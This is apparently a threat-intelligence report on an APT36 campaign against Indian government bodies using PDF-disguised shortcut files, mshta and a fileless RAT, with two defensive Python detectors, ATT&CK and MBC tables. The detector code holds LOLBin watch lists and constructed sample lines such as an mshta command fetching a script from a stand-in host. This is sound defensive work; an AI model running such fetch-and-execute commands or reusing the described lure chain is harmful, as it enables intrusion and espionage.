EXECUTIVE SUMMARY:
A cyber espionage campaign attributed to APT36 has been identified targeting Indian government and strategic sector organizations, leveraging a deceptive multi-stage malware framework delivered via spear phishing. The attack uses a weaponized Windows shortcut (LNK) file that appears as a legitimate PDF to deceive users. Upon activation, trusted system binaries launch hidden scripts that fetch additional components, enabling covert execution without writing traditional malware files to disk. This targeting reflects a focused effort by APT36 to infiltrate sensitive environments through social engineering and stealthy delivery techniques.
The intrusion begins with a spear‑phishing email containing a compressed archive that holds a double‑extension shortcut file disguised as a PDF document. Because Windows hides known file extensions by default, the trailing `.lnk` is not shown and the shortcut passes for an ordinary PDF, enticing victims to open it. When executed, it invokes a legitimate system binary to fetch a script from a remote location; that script decrypts and loads subsequent components directly into memory, avoiding disk writes. The first payload weakens security controls in the operating environment, while a second fileless dynamic link library (DLL) acts as a fully featured Remote Access Trojan. This RAT establishes encrypted command‑and‑control communications, profiles the host system including installed antivirus products, adapts its persistence mechanism accordingly, and supports a broad set of functions such as remote command execution, data exfiltration, file management, screen capture, and clipboard monitoring. The malware also drops a decoy PDF to preserve the user's trust while it operates covertly, and it adjusts its persistence and execution based on the defensive software detected on the host.
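The double-extension shortcut described above is the one artifact a defender can triage before anything executes. The following Python script is an added example, not code from the report or from any vendor tooling: it parses the fixed 76-byte Shell Link header and the StringData block of a `.lnk` file (MS-SHLLINK), then flags the traits this lure relies on: a document-looking name with a hidden `.lnk` suffix, a living-off-the-land target such as `mshta.exe`, a remote URL in the arguments, and a ShowCommand that hides the window. The `build_test_lnk` helper and the `stage.example.invalid` URL are constructed fixtures for the demonstration, not indicators from the campaign; real samples usually also carry an IDList and LinkInfo, which the parser skips over.

```python
import re
import struct

# Fixed CLSID that every Shell Link header carries (MS-SHLLINK 2.1).
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C
# LinkFlags bits (MS-SHLLINK 2.1.1).
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each only when its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the target's window hidden

# Script hosts and proxy-execution binaries a document shortcut has no reason to point at.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
           "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")


def parse_lnk(data: bytes) -> dict:
    """Parse the ShellLinkHeader and StringData of a .lnk; IDList and LinkInfo are skipped."""
    if (len(data) < HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:      # IDListSize (2 bytes) + the list itself
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_cmd}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, not bytes
        off += 2
        if flags & IS_UNICODE:
            info[name] = data[off:off + count * 2].decode("utf-16-le")
            off += count * 2
        else:
            info[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return info


def assess_shortcut(filename: str, data: bytes) -> list:
    """Return findings for a shortcut file; an empty list means nothing suspicious was seen."""
    findings = []
    lower = filename.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(DOC_EXTS):
        findings.append("double extension: shortcut named like a document")
    info = parse_lnk(data)
    target = (info.get("relative_path") or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if target in LOLBINS:
        findings.append(f"target is a living-off-the-land binary: {target}")
    if re.search(r"https?://", info.get("arguments", ""), re.I):
        findings.append("arguments contain a remote URL")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand hides the window (SW_SHOWMINNOACTIVE)")
    return findings


def build_test_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed test fixture: a minimal Unicode .lnk with only RelativePath and Arguments."""
    def ustr(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    flags = IS_UNICODE | HAS_REL_PATH | HAS_ARGS
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 x FILETIME, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3 (76 bytes in total).
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags, 0,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + ustr(relative_path) + ustr(arguments)


# Constructed samples: a lure shaped like the one in the report, and a harmless document shortcut.
SUSPICIOUS = build_test_lnk("..\\..\\..\\Windows\\System32\\mshta.exe",
                            "http://stage.example.invalid/loader.hta",  # placeholder, not an IoC
                            show_command=SW_SHOWMINNOACTIVE)
BENIGN = build_test_lnk("..\\Documents\\quarterly_report.pdf", "")

if __name__ == "__main__":
    for name, blob in (("Report.pdf.lnk", SUSPICIOUS), ("quarterly_report.lnk", BENIGN)):
        print(name, "->", assess_shortcut(name, blob) or "clean")
```

Run it over an extracted archive before the user does: every hit in `assess_shortcut` is a reason to quarantine, and the parser output (target, arguments, show command) is what you would record in the incident timeline.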
This operation demonstrates a significant escalation in targeted espionage tactics, leveraging file format deception, living‑off‑the‑land binaries, and in‑memory execution to evade conventional defenses. The multi‑stage, adaptive nature of the malware underscores the adversary's focus on long‑term access, covert surveillance, and strategic data collection. Organizations operating in similarly sensitive environments should prioritize enhanced detection measures, user awareness training, and behavior‑based security controls to mitigate the risk posed by advanced persistent threat campaigns employing such stealthy, modular techniques.
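Because the payloads never touch disk, the "behavior-based security controls" recommended above have to key on process and registry telemetry rather than file hashes. The Python below is an added example, not part of the report: it evaluates two rules over Sysmon-style events (event 1 process creation, event 13 registry value set) and escalates when a script host launched by Explorer with a URL on its command line is followed, on the same host and within a short window, by a Run-key write from a script host, which is the shape of the chain described in this summary (shortcut launching `mshta.exe`/PowerShell, then Run-key persistence). The event records, host names, paths and the `stage.example.invalid` URL are all constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)

RULE_FETCH = "script_host_from_explorer_with_url"
RULE_PERSIST = "run_key_set_by_script_host"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_event(ev: dict):
    """Return (rule_name, severity) when a single event matches a rule, else None."""
    if ev["event_id"] == 1:  # process creation
        if (basename(ev["image"]) in SCRIPT_HOSTS
                and basename(ev["parent_image"]) == "explorer.exe"
                and URL_RE.search(ev["command_line"])):
            return (RULE_FETCH, "medium")
    elif ev["event_id"] == 13:  # registry value set
        if basename(ev["image"]) in SCRIPT_HOSTS and RUN_KEY_RE.search(ev["target_object"]):
            return (RULE_PERSIST, "medium")
    return None


def correlate(events: list, window: timedelta = timedelta(minutes=10)) -> list:
    """Group rule hits per host; raise one high-severity alert when fetch and persistence
    both occur inside the window, otherwise emit the individual medium hits."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        m = match_event(ev)
        if m:
            hits[ev["host"]].append((ev["time"], m[0], m[1]))
    alerts = []
    for host, rows in hits.items():
        names = {name for _, name, _ in rows}
        span = rows[-1][0] - rows[0][0]
        if {RULE_FETCH, RULE_PERSIST} <= names and span <= window:
            alerts.append({"host": host, "severity": "high", "rules": sorted(names)})
        else:
            for t, name, sev in rows:
                alerts.append({"host": host, "severity": sev, "rules": [name], "time": t})
    return alerts


def ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed telemetry: WS01 shows the full chain, WS02 only ordinary activity.
SAMPLE_EVENTS = [
    {"host": "WS01", "time": ts("2024-01-15 09:00:05"), "event_id": 1,
     "image": "C:\\Windows\\System32\\mshta.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "mshta http://stage.example.invalid/loader.hta"},
    {"host": "WS01", "time": ts("2024-01-15 09:02:10"), "event_id": 13,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target_object": "HKU\\S-1-5-21-111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"host": "WS02", "time": ts("2024-01-15 09:01:00"), "event_id": 1,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell -File C:\\Scripts\\backup.ps1"},
    {"host": "WS02", "time": ts("2024-01-15 09:03:00"), "event_id": 13,
     "image": "C:\\Windows\\System32\\svchost.exe",
     "target_object": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityHealth"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The per-rule hits are deliberately only medium: a script host with a URL on its command line or a Run-key write by PowerShell each occur legitimately, while the two together on one host within minutes almost never do, which is why the correlation, not either rule alone, carries the high severity.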
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1218.005 | System Binary Proxy Execution | Mshta |
| Defense Evasion | T1112 | Modify Registry | — |
| Defense Evasion | T1055.012 | Process Injection | Process Hollowing |
| Defense Evasion | T1036.004 | Masquerading | Masquerade Task or Service |
| Defense Evasion | T1027.001 | Obfuscated Files or Information | Binary Padding |
| Defense Evasion | T1070.004 | Indicator Removal | File Deletion |
| Defense Evasion | T1202 | Indirect Command Execution | — |
| Defense Evasion | T1497.001 | Virtualization / Sandbox Evasion | System Checks |
| Defense Evasion | T1564.001 | Hide Artifacts | Hidden Files and Directories |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Credential Access | T1539 | Steal Web Session Cookie | — |
| Discovery | T1082 | System Information Discovery | — |
| Discovery | T1057 | Process Discovery | — |
| Discovery | T1083 | File and Directory Discovery | — |
| Discovery | T1518.001 | Software Discovery | Security Software Discovery |
| Collection | T1113 | Screen Capture | — |
| Collection | T1115 | Clipboard Data | — |
| Collection | T1005 | Data from Local System | — |
| Collection | T1560.001 | Archive Collected Data | Archive via Utility |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1095 | Non-Application Layer Protocol | — |
| Command and Control | T1573.002 | Encrypted Channel | Asymmetric Cryptography |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
| Impact | T1565.001 | Data Manipulation | Stored Data Manipulation |
MBC MAPPING:
| Objective | Behavior ID | Behavior |
|---|---|---|
| Anti-Behavioral Analysis | B0001 | Debugger Detection |
| Anti-Behavioral Analysis | B0004 | Emulator Detection |
| Anti-Behavioral Analysis | B0009 | Virtual Machine Detection |
| Anti-Static Analysis | B0012 | Disassembler Evasion |
| Collection | E1056 | Input Capture |
| Collection | E1113 | Screen Capture |
| Command and Control | B0030 | C2 Communication |
| Defense Evasion | B0025 | Conditional Execution |
| Defense Evasion | B0027 | Alternative Installation Location |
| Defense Evasion | E1027 | Obfuscated Files or Information |
| Defense Evasion | F0001 | Software Packing |
| Execution | B0011 | Remote Commands |
| Lateral Movement | E1105 | Ingress Tool Transfer |
| Persistence | B0035 | Shutdown Event |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Privilege Escalation | E1055 | Process Injection |
REFERENCES:
The following reports contain further technical details: